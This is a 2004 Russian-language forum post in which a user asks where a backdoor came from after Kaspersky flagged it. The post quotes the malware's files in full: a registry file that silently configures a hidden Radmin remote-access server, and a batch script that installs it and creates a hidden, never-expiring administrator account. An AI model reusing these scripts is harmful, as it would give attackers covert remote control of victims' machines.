namchik
Silver Member | Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Удалил дрВеба, поставил Касперского 5.0.132. Он сразу поймал виря "Backdoor.RA-based", который был в файлах reg.reg и cool.bat (в папках system32 и Temp)
Вот такой был reg.reg:
Цитата:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:31,12,e8,66,7e,cf,e2,5e,98,ae,bb,51,a2,69,68,82
"Port"=hex:47,9f,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
|
И cool.bat
Цитата:
copy rad32.drv %windir%\system32\raddrv.dll
copy rad32.drv %windir%\system\raddrv.dll
copy mad %windir%\system32\admdll.dll
copy rad32.drv %windir%\system\admdll.dll
copy sysinfo.drv %windir%\system32\sdrrv32.exe
copy sysinfo.drv %windir%\system\sdrrv32.exe
copy x.386 %windir%\system32\reg.reg
copy x.386 %windir%\system\reg.reg
regedt32.exe /s %windir%\system32\reg.reg
regedt32.exe /s %windir%\system\reg.reg
regedit.exe /s %windir%\system32\reg.reg
regedit.exe /s %windir%\system\reg.reg
sdrrv32.exe /install /silence
sdrrv32.exe /start
net user . {getoutofhere} /ADD /ACTIVE:YES /EXPIRES:NEVER /TIMES:ALL
net localgroup "Administrators" "." /ADD
|
Откуда ентот вирус мог появиться?
PS. Недавно восстанавливал инфу (при помощи EasyRecovery) с харда, который принес друг. Инфа у него полетела, по его словам, от вируса... Из-за этого может быть   |
Всего записей: 4080 | Зарегистр. 01-06-2004 | Отправлено: 12:32 16-06-2004 | Исправлено: namchik, 18:08 16-06-2004 |
|
